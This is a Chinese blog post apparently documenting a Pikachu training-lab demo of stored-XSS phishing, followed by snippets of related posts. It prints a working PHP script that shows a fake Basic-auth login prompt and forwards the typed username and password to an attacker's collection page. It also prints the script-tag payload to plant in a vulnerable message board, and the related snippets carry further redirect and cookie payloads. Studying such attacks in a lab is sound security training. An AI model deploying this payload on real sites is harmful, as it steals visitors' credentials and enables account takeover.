6.XSS-钓鱼攻击展示(存储型xss)

于 2024-06-24 07:00:00 发布
阅读量224 收藏 1
点赞数 6
分类专栏: 网络安全web测试之xss与暴漏破解 文章标签: xss 前端 xss钓鱼
曲云龙
本文链接:https://blog.csdn.net/weixin_46253249/article/details/139701439
版权

xss钓鱼演示

钓鱼攻击利用页面 D:\phpStudy\WWW\pikachu\pkxss\xfish
修改配置文件里面对应自己的入侵者的IP地址或者域名,对应的路径下的fish.php脚本如下:

<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框,并给出迷惑性的info
    header('Content-type:text/html;charset=utf-8');
    header("WWW-Authenticate: Basic realm='认证'");
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authorization Required.';
    exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IP
//    header("Location: http://192.168.1.15/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
	header("Location: http://www.pikachu.net/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
    &password={$_SERVER[PHP_AUTH_PW]}");
}

?>

代码意思:就是将用户输入的账号信息发送到攻击者的平台上。

输入入侵者的IP地址
<script src="http://192.168.0.101/pikachu/pkxss/xfish/fish.php"></script>
基于我的环境如下
<script src='http://www.pikachu.net/pkxss/xfish/fish.php'></script>

在存在存储型xss漏洞的网页上,输入以上代码,永久性存储在网页前端,如果用户警惕不是很高,就会中招
将上面的script攻击代码输入到留言板里面进行提交,就会出现弹窗进行输入账号和密码,每次刷新都会弹窗
在这里插入图片描述

现在攻击者平台没有任何信息
在这里插入图片描述

当用户输入账号和密码,确定以后就会直接提交到攻击的平台上

愿听风成曲
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用xss漏洞结合xss平台实现社工钓鱼
2ed
01-03 7174
本文主要介绍如何结合 xss平台 利用xss漏洞 然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取 用户和密码,之后传到我们的公网服务器中 首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它有txtx ,然后呢你还得有一台公网服务器,当然在局域网中的话就可以考虑用自己的物理机开一个web服务器。用来接收钓鱼页 post回来的用户和密码。然后呢 随便去个xss平台注册 ,我注册的是这个x...
XSS钓鱼攻击演示。
weixin_44720762的博客
05-01 3409
basic认证的钓鱼攻击: 在存在xss漏洞的页面去嵌入一个向用户端提交的请求程序(javascript或者是链接请求。)当用户打开了这个链接,就会向后台发送请求,后台会返回一个如上图所示的basic认证的头部。在用户的安全意识不强,为察觉出其中异样的情况下如实输入了自己的用户信息。这时候信息被发送到攻击人员的接受端。 相关的嵌入代码 相关的basic认证提示框代码 xfish原代码 具体内容:...
Pikachu——Xss钓鱼
m0_60767986的博客
04-23 7112
前端js代码限制输入框只能提交20个字段,将它修改为100即可(当然,这是getxss,可以直接在url传参处添加攻击语句)提交攻击语句后发现,跳转回了靶场首页,网页debug发现:第一:请求了指定的钓鱼页面的url,并在后面携带了我的cookie信息第二:跳转回靶场首页(前面“靶场cookie获取的额外操作”的结果,用来抵消受害者的怀疑)
xss基础认证钓鱼代码收集
一个安全研究员
12-26 2857
i了i了
利用XSS进行网页钓鱼
Monsterlz123的博客
07-22 6579
XSS漏洞】利用XSS进行网页钓鱼 Hello 各位小伙伴周末晚上好 这里是你们微胖的小编Monster。 话说小编的老妈今天给小编打电话,叮嘱我平时吃饭少吃一点… 说昨天看我朋友圈发的照片,已经从以前的瓜子脸,变成国字脸了… Whatever,让我们一起来看看今天的内容吧 一、实验概述 实验拓扑: 利用XSS漏洞,我们可以在网页中插入恶意js代码,通过js代码,我们可以干很多事情,例...
xss-labs-master.rar
05-09
根据脚本的执行环境,XSS被分为三种类:反射XSS存储XSS和DOMXSS。 1. 反射XSS:恶意代码通过URL参数传递,当用户点击链接或提交表单时触发。 2. 存储XSS:恶意脚本被永久存储在服务器上,所有访问该...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
1. **存储XSS**:也称为持久XSS攻击者将恶意脚本存入服务器,当其他用户访问同一页面时,脚本将在用户的浏览器中执行。 2. **反射XSS**:非持久性,恶意脚本通过URL参数传递,用户点击链接或者提交表单后,...
YXcms-含有存储XSS漏洞的源码包
03-17
4. **危害**:存储XSS攻击可能导致敏感数据泄露(如cookies、会话ID)、用户身份冒用、钓鱼攻击、传播恶意软件等严重后果。 5. **防范措施**:防止存储XSS的关键在于对用户输入进行严格的过滤和转义,确保所有...
xss-labs.zip
06-25
1. 存储XSS攻击者将恶意脚本存入服务器,当其他用户访问含有恶意脚本的页面时,脚本会在用户的浏览器中执行。在实验室环境中,我们需要找出能够将脚本注入数据库并触发执行的途径。 2. 反射XSS:这种类的...
18.XSS跨站脚本攻击原理及代码攻防演示(一)1
08-03
- 存储XSS攻击代码存储在服务器端,如评论区,当其他用户查看页面时,恶意脚本被执行。 - DOMXSS:通过修改页面的DOM(Document Object Model)结构引入恶意脚本,通常发生在客户端,无需服务器参与。 5. ...
XSS漏洞钓鱼
weixin_51356351的博客
11-19 450
实验环境 PHPstudy DVWA靶场 实验步骤 重定向钓鱼 1、把当前页面重定向到一个钓鱼页面,例如重定向到百度, <script>document.location.href="http://baidu.com"</script> 2、打开DVWA靶场 选择(XSS)stored 然后F12打开查看器,将输入限制值改的大一点 插入代码则会重定向到百度页面 ...
XSS钓鱼攻击
WINDY_PACE的博客
05-13 1388
XSS 不与后台服务器产⽣数据交互,通过前端的dom节点形成的XSS漏洞,跟服务器⽆关。⼀...
XSS 代码总结
热门推荐
bcbobo21cn的专栏
12-08 1万+
XSS跨站测试代码大全 http://www.cnblogs.com/dsky/archive/2012/04/06/2434768.html '>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3
xss实现钓鱼操作
weixin_38168786的博客
01-29 1324
自己写一个和原网站后台登录地址一模一样的钓鱼页面JS加载一个iframe 100%覆盖原网页 提示登录超时重新登录 因为是iframe加载 url地址不变 钓鱼成功后 再跳转回/admin/index.php 因为目标session没过期 所以可以极大程度的模拟正常的登录成功操作。 注入如下代码: 1 setTimeout(function(){ 2 parent.docum...
xss漏洞钓鱼
rescure的博客
01-21 1034
利用xss漏洞钓鱼 简要:由于资金问题,没有自己的网站,故在此用xss平台和dvwa实现xss反射钓鱼操作 NO.1 正常进入dvwa,模式选择为low,使用xss(refelect) 进入xss平台,选择创建项目,在此为dvwa,创建之后,选择功能默认即可 ,随后平台会生成自己的js代码 NO.2 接下来,复制生成的js代码,粘贴至xss漏洞处(具体情况需要自己分析是什么类的) 接下来就是copy大法了 ...
漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法
爱国小白帽
02-24 4914
实验环境: PHPstudy 火狐浏览器、IE DVWA靶场 实验准备: 重定向钓鱼,例如重定向到百度,代码如下: < script> document.location ="http://www.baidu.com" </script> ...
渗透测试-xss钓鱼测试和xss盲打
lza20001103的博客
04-24 2319
渗透测试-xss钓鱼测试和xss盲打
实验27:xss钓鱼演示
qq_44720671的博客
04-18 951
实验思路: 我们会用basic认证来做一个钓鱼的场景 我们可以在存在着xss漏洞的页面里面嵌入一个请求,当用户打开这个嵌入了恶意代码的页面,用户的页面就会弹出图中的登陆框,如果用户的安全意识不太够,那么就会把账号和密码发送到我们的pkxs后台 我们在pikachu的储存XSS上来做演示,输入这个payload 点提交后 因为他是个存储xss,所以我们的留言板里已经留下了,所以我们刷新一下...
http://xss.tesla-space.com/
最新发布
07-27
XSS攻击是指攻击者向web页面的输入表单、URL或留言板等位置插入恶意JavaScript代码,以达到攻击者的目的。\[2\]根据引用\[1\]的描述,XSS攻击可以导致攻击者获取用户的cookies,从而以用户的身份进行任何操作。因此...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愿听风成曲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值